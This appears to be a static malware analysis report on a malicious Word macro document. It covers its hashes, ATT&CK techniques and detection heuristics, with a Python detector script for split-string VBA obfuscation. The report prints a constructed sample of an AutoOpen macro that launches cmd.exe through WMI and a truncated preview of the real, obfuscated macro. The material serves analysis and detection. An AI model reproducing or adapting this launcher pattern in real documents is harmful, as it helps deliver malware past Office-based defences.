Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9c03067070ea111…

MALICIOUS

Office (OLE)

Size: 223.5 KB
Created: 2019-04-15 06:56:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: a0551eb320025285ec83941339247b02
SHA-1: 3dda82bf566967950fb757a432fe594590616e75
SHA-256: f9c03067070ea11198cd749c78be77c6fb75dc108662309da82beeeb5592cf70
Risk score: 302

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32

The sample is a malicious Office document containing heavily obfuscated VBA macros. The macros call GetObject and CreateObject against the WMI moniker (winmgmts:) to reach the Win32_Process class and invoke its Create method, i.e. they start a new process through WMI rather than directly from Word. Because a process created this way is spawned by the WMI provider host rather than as a child of WINWORD.EXE, the technique evades detections that only watch for Office spawning cmd.exe or powershell.exe. It is a common way to download and run further malware stages; the ClamAV signature below classifies the document as a downloader, although no download URL was recovered from the macro itself.

Heuristics 8

  • ClamAV: Doc.Downloader.00536d-6940733-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6940733-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure (Sub autoopen() in the preview below), which Word runs automatically when the document is opened, so no user interaction beyond enabling macros is needed.
  • GetObject call high OLE_VBA_GETOBJ
    The macro calls GetObject, the function used here to bind to the winmgmts: moniker and obtain the WMI object on which Win32_Process.Create is invoked.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. Note that in this sample a modern VBA project was in fact recovered (macros.bas under Extracted artifacts), so the marker is redundant with the OLE_VBA_AUTOOPEN finding above rather than an independent signal.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace URI that Office writes into document markup, not a host the macro contacts. It is the only URL recovered, and it comes from the document body rather than from the macro, so the next-stage download location is not visible in static analysis.
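The two critical findings above (OLE_VBA_WMI_PROCESS_CREATE and OLE_VBA_SPLIT_KEYWORD_OBFUSCATION) both depend on folding concatenated string fragments back together before keyword matching. The following Python script is an added illustration of that logic, not part of this report's scanner and not code from oletools: it folds runs of "..." & Chr(n) & "..." operands into single literals, flags dangerous names that appear only after folding, and then applies the WMI, AutoOpen and GetObject checks to the rewritten source. The SAMPLE_VBA and BENIGN_VBA inputs are constructed for the example and are not the macro extracted from this sample; the keyword list and finding names are assumptions modelled on the heuristics above.

```python
import re

# Constructed sample, NOT the macro carved from the report's document.
# It mimics the split-literal WMI launcher pattern the heuristics describe.
SAMPLE_VBA = r'''
Sub autoopen()
    Dim w As Object, p As Object, pid As Long
    w = "win" & "mgm" & "ts:"
    Set p = GetObject(w).Get("Win" & "32_" & "Pro" & "cess")
    p.Create "cmd.exe /c " & Chr(101) & "cho hi", Null, Null, pid
End Sub
'''

# Constructed benign control: concatenation alone is not suspicious.
BENIGN_VBA = r'''
Sub Greet()
    MsgBox "Hello, " & "world"
End Sub
'''

# Assumed keyword list (lower-case); a real scanner would carry a longer one.
DANGEROUS = (
    "winmgmts", "win32_process", "scripting.filesystemobject",
    "wscript.shell", "shell.application", "powershell",
    "urldownloadtofile", "rundll32",
)

# One concatenation operand: a quoted literal ("" is an escaped quote)
# or a Chr(n) / ChrW(n) call with a numeric argument.
_PIECE = r'(?:"(?:[^"]|"")*"|ChrW?\$?\(\s*\d+\s*\))'
# A chain of two or more operands joined by & or +.
_CHAIN = re.compile(_PIECE + r'(?:\s*[&+]\s*' + _PIECE + r')+', re.I)
_PIECES = re.compile(_PIECE, re.I)


def _decode_piece(tok):
    """Turn one operand token into the string value it contributes."""
    if tok.startswith('"'):
        return tok[1:-1].replace('""', '"')
    return chr(int(re.search(r'\d+', tok).group()))


def reassemble(vba):
    """Fold every concatenation chain into one literal.

    Returns (rewritten_source, chains); chains is a list of
    (pieces, joined) so callers can see what each chain hid.
    """
    chains = []

    def fold(m):
        pieces = [_decode_piece(t) for t in _PIECES.findall(m.group())]
        joined = "".join(pieces)
        chains.append((pieces, joined))
        return '"' + joined.replace('"', '""') + '"'

    return _CHAIN.sub(fold, vba), chains


def scan(vba):
    """Return the sorted list of finding identifiers raised for the source."""
    rewritten, chains = reassemble(vba)
    low = rewritten.lower()
    hits = set()
    # Split-keyword obfuscation: the name exists only after folding,
    # never inside any single operand.
    for pieces, joined in chains:
        j = joined.lower()
        if any(kw in j and not any(kw in p.lower() for p in pieces)
               for kw in DANGEROUS):
            hits.add("OLE_VBA_SPLIT_KEYWORD_OBFUSCATION")
    # WMI launcher: moniker + class + Create method, checked on folded text.
    if "winmgmts" in low and "win32_process" in low and ".create" in low:
        hits.add("OLE_VBA_WMI_PROCESS_CREATE")
    if re.search(r'\bsub\s+(autoopen|auto_open|document_open)\b', low):
        hits.add("OLE_VBA_AUTOOPEN")
    if "getobject(" in low:
        hits.add("OLE_VBA_GETOBJ")
    return sorted(hits)


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(name, scan(src))
        for pieces, joined in reassemble(src)[1]:
            print("   ", pieces, "->", repr(joined))
```

Running it prints the four finding identifiers for the constructed sample and nothing for the benign control; the folded chains show why a scanner that only greps raw literals for winmgmts or Win32_Process misses this pattern.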

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  58498 bytes
SHA-256: db36abe1943a4bf486d2fc51b751fef306f467e48cef52edfd451ac49ff8a292
Preview script
First 1,000 lines of the extracted script (truncated below). Nearly all of the visible body is opaque-predicate padding: If comparisons and Select Case blocks over variables that are never assigned, with random arithmetic in arms that are never matched. The only substantive statement in the preview is the bare call fACBDG4A, whose procedure is defined beyond the truncated portion.
Attribute VB_Name = "VDBGABcZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AAAUXQcA"
Attribute VB_Base = "0{41B80301-4F30-4DFF-9E13-FF01FAAE48FC}{D3CACD97-8909-4E1C-A8B5-B5BB877E6850}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UAC4AA"
Attribute VB_Base = "0{189A0FF8-4D96-4B19-97D3-01F9E2211D01}{F88DC55B-ECC5-41AE-8FAD-B6A803EAC6A8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "hAAAQA"
Sub autoopen()
   If CABxZA = zZQXZADA Then
      Select Case KAAU4x_D
         Case 824423980
            JGQxCX11 = 541953637
            B1_AQAA = ZBkw4cDU
            WAACAAw = Asc(197431235 + Log(566296674 - Rnd(SAoAQC)) / 230159009 + Oct(361161562))
         Case 260274818
            iQDABA = rBQcGQkD
            bQw4UkG = rxkDABA
            dXwAA4U = CDate(507087702 - Cos(582724791 * Rnd(930168264) + 184544308 * 198050860) * dAAXAAA / Round(240484163))
         Case 954027194
            dAUwZkQ1 = YXAA4oXQ
            OAABAQ = CStr(687146031)
            dAwAAw = Atn(693080714 + Atn(8532107) * qAoAAD * CDate(WAA4Uw + 36 + UZAQCA_ / CStr(XA14ZA)))
      End Select
End If
   If UAZw4Z = PAAkUwU Then
      Select Case MGAA_4wU
         Case 662399757
            fADAAAA = 886185252
            fA4DQ4B = AUQAAxD
            m1ACxUxZ = Asc(561466704 + Log(82608497 - Rnd(uQAAAxA)) / 80918609 + Oct(687553194))
         Case 998728333
            O_AAcAwA = HZAGAAA
            nACko4 = zAQAAo
            bBCZkBAA = CDate(507539159 - Cos(383013148 * Rnd(424800738) + 346047071 * 961173696) * BUCAUAD1 / Round(466825800))
         Case 324182574
            o4AU4A = SDQAAA
            ZX1A4AQ = CStr(839175312)
            jDXAZX = Atn(957733703 + Atn(592807201) * ScA4c1Z * CDate(BAcAAQ1 + 36 + icB14DAA / CStr(f4cA1A)))
      End Select
End If
   If NABA4GXQ = DADAUBAA Then
      Select Case vAQAXA
         Case 811608193
            SUAZBDA = 203267347
            XDUAGACx = iABGcxkA
            XBcXAUAw = Asc(252737846 + Log(853717231 - Rnd(lAAAwAk)) / 702600719 + Oct(252830482))
         Case 112938340
            wDQAQBC = ZQ4DZo1X
            iUxQGABA = rGAZQA
            vUAoccw4 = CDate(736973785 - Cos(45942889 * Rnd(723496360) + 936787964 * 841547363) * RQAAQBA / Round(680824439))
         Case 38404462
            rAwkQwQA = SUUxAA
            DD1AAcUA = CStr(349544721)
            zxDwDAAU = Atn(626779698 + Atn(494500476) * VwZcAxA * CDate(QoCA4ZAw + 36 + tAA1ccZA / CStr(hc1BCoDA)))
      End Select
End If
fACBDG4A
   If BCAZAG = uCX1BG4Q Then
      Select Case aBA4oAAA
         Case 237027961
            J1AcAAU = 725651001
            JAUBBUkB = iAA4DxAD
            bADUUAA = Asc(297422216 + Log(719513665 - Rnd(pAxABA)) / 744389716 + Oct(303320506))
         Case 438840034
            DAxAAQ = z1ACAA
            GAABBC = Jw1Q1UQG
            TBUABZG = CDate(601632226 - Cos(233712794 * Rnd(916568828) + 167053570 * 107627104) * JUAUkCw / Round(126606403))
         Case 668598851
            qADB1ZcA = pAAAAAw
            jDAUABD = CStr(408859490)
            LAXAAQAB = Atn(764118703 + Atn(937464247) * wAXUA1 * CDate(qcAxBA + 36 + oAwDADA / CStr(YABBB_Q)))
      End Select
End If
   If wGBkAX = uQQUXUAA Then
      Select Case wAAB4wAQ
         Case 294513077
            aA_Q4B = 479579391
            iABUBA = GAACZkAA
            DAUGoXB = Asc(375555191 + Log(615128457 - Rnd(iBcCAk)) / 337159818 + Oct(867101891))
         Case 561078452
            iAAwAwxA = qZA4DA
 
... (truncated)